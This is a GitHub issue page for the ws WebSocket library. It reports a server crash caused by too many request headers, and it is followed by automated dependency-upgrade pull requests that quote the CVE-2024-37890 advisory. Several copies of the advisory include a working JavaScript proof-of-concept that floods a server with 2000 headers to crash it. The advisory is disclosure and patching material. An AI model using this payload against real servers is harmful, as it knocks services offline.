#2125) …90 CG Issue #### Details WS (Web Socket)'s latest version is vulnerable and unmaintained. Our repo don't use it directly but it uses as dependency from other packages like **puppeteer-core**. So the fix is available in latest WS version, which we added now in our package json under resolutions. WS repo issue link: websockets/ws#2230 WS version 8.18.0 Release notes - https://github.com/websockets/ws/releases/tag/8.18.0 ##### Motivation This change will fix [CVE-2024-37890](https://dev.azure.com/mseng/1ES/_componentGovernance/1010/alert/203269?typeId=286939&pipelinesTrackingFilter=0) ##### Context <!-- Are there any parts that you've intentionally left out-of-scope for a later PR to handle? --> <!-- Were there any alternative approaches you considered? What tradeoffs did you consider? --> #### Pull request checklist <!-- If a checklist item is not applicable to this change, write "n/a" in the checkbox --> - [x] Addresses an existing issue: [CVE-2024-37890](https://dev.azure.com/mseng/1ES/_componentGovernance/1010/alert/203269?typeId=286939&pipelinesTrackingFilter=0) - [ NA] Added relevant unit test for your changes. (`yarn test`) - [ NA] Verified code coverage for the changes made. Check coverage report at: `<rootDir>/test-results/unit/coverage` - [x] Ran precheckin (`yarn precheckin`)
gagoar
pushed a commit
to gagoar/invoke-aws-lambda
that referenced
this issue
Aug 6, 2024
[](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://github.com/websockets/ws) | [`7.5.7` -> `7.5.10`](https://renovatebot.com/diffs/npm/ws/7.5.7/7.5.10) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2024-37890](https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q) ### Impact A request with a number of headers exceeding the[`server.maxHeadersCount`][] threshold could be used to crash a ws server. ### Proof of concept ```js const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); }); ``` ### Patches The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6) ### Workarounds In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. ### Credits The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [websockets/ws#2230. ### References - [websockets/ws#2230 - [websockets/ws#2231 [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v7.5.10`](https://github.com/websockets/ws/releases/tag/7.5.10) [Compare Source](https://github.com/websockets/ws/compare/7.5.9...7.5.10) ### Bug fixes - Backported [`e55e510`](https://github.com/websockets/ws/commit/e55e5106) to the 7.x release line ([`22c2876`](https://github.com/websockets/ws/commit/22c28763)). ### [`v7.5.9`](https://github.com/websockets/ws/releases/tag/7.5.9) [Compare Source](https://github.com/websockets/ws/compare/7.5.8...7.5.9) ### Bug fixes - Backported [`bc8bd34`](https://github.com/websockets/ws/commit/bc8bd34e) to the 7.x release line ([`0435e6e`](https://github.com/websockets/ws/commit/0435e6e1)). ### [`v7.5.8`](https://github.com/websockets/ws/releases/tag/7.5.8) [Compare Source](https://github.com/websockets/ws/compare/7.5.7...7.5.8) ### Bug fixes - Backported [`0fdcc0a`](https://github.com/websockets/ws/commit/0fdcc0af) to the 7.x release line ([`2758ed3`](https://github.com/websockets/ws/commit/2758ed35)). - Backported [`d68ba9e`](https://github.com/websockets/ws/commit/d68ba9e1) to the 7.x release line ([`dc1781b`](https://github.com/websockets/ws/commit/dc1781bc)). </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View the [repository job log](https://developer.mend.io/github/gagoar/invoke-aws-lambda). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MTAuMSIsInVwZGF0ZWRJblZlciI6IjM3LjQzOC4wIiwidGFyZ2V0QnJhbmNoIjoibWFzdGVyIiwibGFiZWxzIjpbXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
4 tasks
github-merge-queue bot
pushed a commit
to camunda/camunda
that referenced
this issue
Aug 9, 2024
[](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://github.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. ### GitHub Vulnerability Alerts #### [CVE-2024-37890](https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q) ### Impact A request with a number of headers exceeding the[`server.maxHeadersCount`][] threshold could be used to crash a ws server. ### Proof of concept ```js const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); }); ``` ### Patches The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6) ### Workarounds In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. ### Credits The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [websockets/ws#2230. ### References - [websockets/ws#2230 - [websockets/ws#2231 [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://github.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://github.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://github.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [websockets/ws#2230. In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View the [repository job log](https://developer.mend.io/github/camunda/camunda). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yMC4xIiwidXBkYXRlZEluVmVyIjoiMzguMjAuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiYXJlYS9zZWN1cml0eSIsImF1dG9tZXJnZSJdfQ==-->
This was referenced Aug 15, 2024
OKEAMAH
added a commit
to OKEAMAH/ethers.js
that referenced
this issue
Aug 19, 2024
 <h3>Snyk has created this PR to upgrade ws from 8.17.1 to 8.18.0.</h3> :information_source: Keep your dependencies up-to-date. This makes it easier to fix existing vulnerabilities and to more quickly identify and fix newly disclosed vulnerabilities when they affect your project. <hr/> - The recommended version is **1 version** ahead of your current version. - The recommended version was released on **a month ago**. <details> <summary><b>Release notes</b></summary> <br/> <details> <summary>Package name: <b>ws</b></summary> <ul> <li> <b>8.18.0</b> - <a href="https://github.com/websockets/ws/releases/tag/8.18.0">2024-07-03</a></br><h1>Features</h1> <ul> <li>Added support for <code>Blob</code> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2347258138" data-permission-text="Title is private" data-url="websockets/ws#2229" data-hovercard-type="pull_request" data-hovercard-url="/websockets/ws/pull/2229/hovercard" href="https://github.com/websockets/ws/pull/2229">#2229</a>).</li> </ul> </li> <li> <b>8.17.1</b> - <a href="https://github.com/websockets/ws/releases/tag/8.17.1">2024-06-16</a></br><h1>Bug fixes</h1> <ul> <li>Fixed a DoS vulnerability (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2355202628" data-permission-text="Title is private" data-url="websockets/ws#2231" data-hovercard-type="pull_request" data-hovercard-url="/websockets/ws/pull/2231/hovercard" href="https://github.com/websockets/ws/pull/2231">#2231</a>).</li> </ul> <p>A request with a number of headers exceeding the<a href="https://nodejs.org/api/http.html#servermaxheaderscount" rel="nofollow"><code>server.maxHeadersCount</code></a><br> threshold could be used to crash a ws server.</p> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); });"><pre><span class="pl-k">const</span> <span class="pl-s1">http</span> <span class="pl-c1">=</span> <span class="pl-en">require</span><span class="pl-kos">(</span><span class="pl-s">'http'</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-k">const</span> <span class="pl-v">WebSocket</span> <span class="pl-c1">=</span> <span class="pl-en">require</span><span class="pl-kos">(</span><span class="pl-s">'ws'</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-k">const</span> <span class="pl-s1">wss</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> <span class="pl-v">WebSocket</span><span class="pl-kos">.</span><span class="pl-c1">Server</span><span class="pl-kos">(</span><span class="pl-kos">{</span> <span class="pl-c1">port</span>: <span class="pl-c1">0</span> <span class="pl-kos">}</span><span class="pl-kos">,</span> <span class="pl-k">function</span> <span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-k">const</span> <span class="pl-s1">chars</span> <span class="pl-c1">=</span> <span class="pl-s">"!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~"</span><span class="pl-kos">.</span><span class="pl-en">split</span><span class="pl-kos">(</span><span class="pl-s">''</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-k">const</span> <span class="pl-s1">headers</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span><span class="pl-kos">}</span><span class="pl-kos">;</span> <span class="pl-k">let</span> <span class="pl-s1">count</span> <span class="pl-c1">=</span> <span class="pl-c1">0</span><span class="pl-kos">;</span> <span class="pl-k">for</span> <span class="pl-kos">(</span><span class="pl-k">let</span> <span class="pl-s1">i</span> <span class="pl-c1">=</span> <span class="pl-c1">0</span><span class="pl-kos">;</span> <span class="pl-s1">i</span> <span class="pl-c1"><</span> <span class="pl-s1">chars</span><span class="pl-kos">.</span><span class="pl-c1">length</span><span class="pl-kos">;</span> <span class="pl-s1">i</span><span class="pl-c1">++</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">count</span> <span class="pl-c1">===</span> <span class="pl-c1">2000</span><span class="pl-kos">)</span> <span class="pl-k">break</span><span class="pl-kos">;</span> <span class="pl-k">for</span> <span class="pl-kos">(</span><span class="pl-k">let</span> <span class="pl-s1">j</span> <span class="pl-c1">=</span> <span class="pl-c1">0</span><span class="pl-kos">;</span> <span class="pl-s1">j</span> <span class="pl-c1"><</span> <span class="pl-s1">chars</span><span class="pl-kos">.</span><span class="pl-c1">length</span><span class="pl-kos">;</span> <span class="pl-s1">j</span><span class="pl-c1">++</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-k">const</span> <span class="pl-s1">key</span> <span class="pl-c1">=</span> <span class="pl-s1">chars</span><span class="pl-kos">[</span><span class="pl-s1">i</span><span class="pl-kos">]</span> <span class="pl-c1">+</span> <span class="pl-s1">chars</span><span class="pl-kos">[</span><span class="pl-s1">j</span><span class="pl-kos">]</span><span class="pl-kos">;</span> <span class="pl-s1">headers</span><span class="pl-kos">[</span><span class="pl-s1">key</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-s">'x'</span><span class="pl-kos">;</span> <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-c1">++</span><span class="pl-s1">count</span> <span class="pl-c1">===</span> <span class="pl-c1">2000</span><span class="pl-kos">)</span> <span class="pl-k">break</span><span class="pl-kos">;</span> <span class="pl-kos">}</span> <span class="pl-kos">}</span> <span class="pl-s1">headers</span><span class="pl-kos">.</span><span class="pl-c1">Connection</span> <span class="pl-c1">=</span> <span class="pl-s">'Upgrade'</span><span class="pl-kos">;</span> <span class="pl-s1">headers</span><span class="pl-kos">.</span><span class="pl-c1">Upgrade</span> <span class="pl-c1">=</span> <span class="pl-s">'websocket'</span><span class="pl-kos">;</span> <span class="pl-s1">headers</span><span class="pl-kos">[</span><span class="pl-s">'Sec-WebSocket-Key'</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-s">'dGhlIHNhbXBsZSBub25jZQ=='</span><span class="pl-kos">;</span> <span class="pl-s1">headers</span><span class="pl-kos">[</span><span class="pl-s">'Sec-WebSocket-Version'</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-s">'13'</span><span class="pl-kos">;</span> <span class="pl-k">const</span> <span class="pl-s1">request</span> <span class="pl-c1">=</span> <span class="pl-s1">http</span><span class="pl-kos">.</span><span class="pl-en">request</span><span class="pl-kos">(</span><span class="pl-kos">{</span> <span class="pl-c1">headers</span>: <span class="pl-s1">headers</span><span class="pl-kos">,</span> <span class="pl-c1">host</span>: <span class="pl-s">'127.0.0.1'</span><span class="pl-kos">,</span> <span class="pl-c1">port</span>: <span class="pl-s1">wss</span><span class="pl-kos">.</span><span class="pl-en">address</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-c1">port</span> <span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-s1">request</span><span class="pl-kos">.</span><span class="pl-en">end</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">;</span></pre></div> <p>The vulnerability was reported by <a href="https://github.com/rrlapointe">Ryan LaPointe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2354846108" data-permission-text="Title is private" data-url="websockets/ws#2230" data-hovercard-type="issue" data-hovercard-url="/websockets/ws/issues/2230/hovercard" href="https://github.com/websockets/ws/issues/2230">#2230</a>.</p> <p>In vulnerable versions of ws, the issue can be mitigated in the following ways:</p> <ol> <li>Reduce the maximum allowed length of the request headers using the<br> <a href="https://nodejs.org/api/cli.html#--max-http-header-sizesize" rel="nofollow"><code>--max-http-header-size=size</code></a> and/or the <a href="https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener" rel="nofollow"><code>maxHeaderSize</code></a> options so<br> that no more headers than the <code>server.maxHeadersCount</code> limit can be sent.</li> <li>Set <code>server.maxHeadersCount</code> to <code>0</code> so that no limit is applied.</li> </ol> </li> </ul> from <a href="https://github.com/websockets/ws/releases">ws GitHub release notes</a> </details> </details> --- > [!IMPORTANT] > > - Check the changes in this PR to ensure they won't cause issues with your project. > - This PR was automatically created by Snyk using the credentials of a real user. --- **Note:** _You are seeing this because you or someone else with access to this repository has authorized Snyk to open upgrade PRs._ **For more information:** <img src="https://api.segment.io/v1/pixel/track?data=eyJ3cml0ZUtleSI6InJyWmxZcEdHY2RyTHZsb0lYd0dUcVg4WkFRTnNCOUEwIiwiYW5vbnltb3VzSWQiOiI5OWYyNjVlZi00ZjIwLTQ2MTItOWI4NS05OGZhMTU1Y2IwN2IiLCJldmVudCI6IlBSIHZpZXdlZCIsInByb3BlcnRpZXMiOnsicHJJZCI6Ijk5ZjI2NWVmLTRmMjAtNDYxMi05Yjg1LTk4ZmExNTVjYjA3YiJ9fQ==" width="0" height="0"/> > - 🧐 [View latest project report](https://app.snyk.io/org/okeamah/project/79f5fe07-5650-42a8-a92c-0ae46036ffc8?utm_source=github&utm_medium=referral&page=upgrade-pr) > - 📜 [Customise PR templates](https://docs.snyk.io/scan-using-snyk/pull-requests/snyk-fix-pull-or-merge-requests/customize-pr-templates) > - 🛠 [Adjust upgrade PR settings](https://app.snyk.io/org/okeamah/project/79f5fe07-5650-42a8-a92c-0ae46036ffc8/settings/integration?utm_source=github&utm_medium=referral&page=upgrade-pr) > - 🔕 [Ignore this dependency or unsubscribe from future upgrade PRs](https://app.snyk.io/org/okeamah/project/79f5fe07-5650-42a8-a92c-0ae46036ffc8/settings/integration?pkg=ws&utm_source=github&utm_medium=referral&page=upgrade-pr#auto-dep-upgrades) <!--- (snyk:metadata:{"customTemplate":{"variablesUsed":[],"fieldsUsed":[]},"dependencies":[{"name":"ws","from":"8.17.1","to":"8.18.0"}],"env":"prod","hasFixes":false,"isBreakingChange":false,"isMajorUpgrade":false,"issuesToFix":[],"prId":"99f265ef-4f20-4612-9b85-98fa155cb07b","prPublicId":"99f265ef-4f20-4612-9b85-98fa155cb07b","packageManager":"npm","priorityScoreList":[],"projectPublicId":"79f5fe07-5650-42a8-a92c-0ae46036ffc8","projectUrl":"https://app.snyk.io/org/okeamah/project/79f5fe07-5650-42a8-a92c-0ae46036ffc8?utm_source=github&utm_medium=referral&page=upgrade-pr","prType":"upgrade","templateFieldSources":{"branchName":"default","commitMessage":"default","description":"default","title":"default"},"templateVariants":[],"type":"auto","upgrade":[],"upgradeInfo":{"versionsDiff":1,"publishedDate":"2024-07-03T16:45:31.280Z"},"vulns":[]}) --->
This was referenced Aug 21, 2024
](https://renovatebot.com){kind=link}
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Is there an existing issue for this?
Description
I use this package for a websocket server. In the process of changing some options to try to make my websocket server slightly more resistant to DoS, I lowered the maxHeadersCount field on the HTTP server from its default of 2000 to a lower value. I then tested to see whether the server would reject requests with too many headers. Instead, the server crashed due to a
TypeErrorfrom websocket-server.js line 246. This seems like a DoS issue.I found this similar issue: #1838
ws version
8.17.0
Node.js Version
v21.5.0
System
OS: Debian GNU/Linux 12 (bookworm)
CPU: x64 Intel Core i5 CPU
Memory: 2.62 GB / 6.58 GB
Container: Yes
Shell: /bin/bash
Expected result
I expected the websocket server to refuse the handshake. Maybe respond with a 400 Bad Request. I did not expect my server app to crash from a
TypeError.Actual result
Attachments
No response
The text was updated successfully, but these errors were encountered: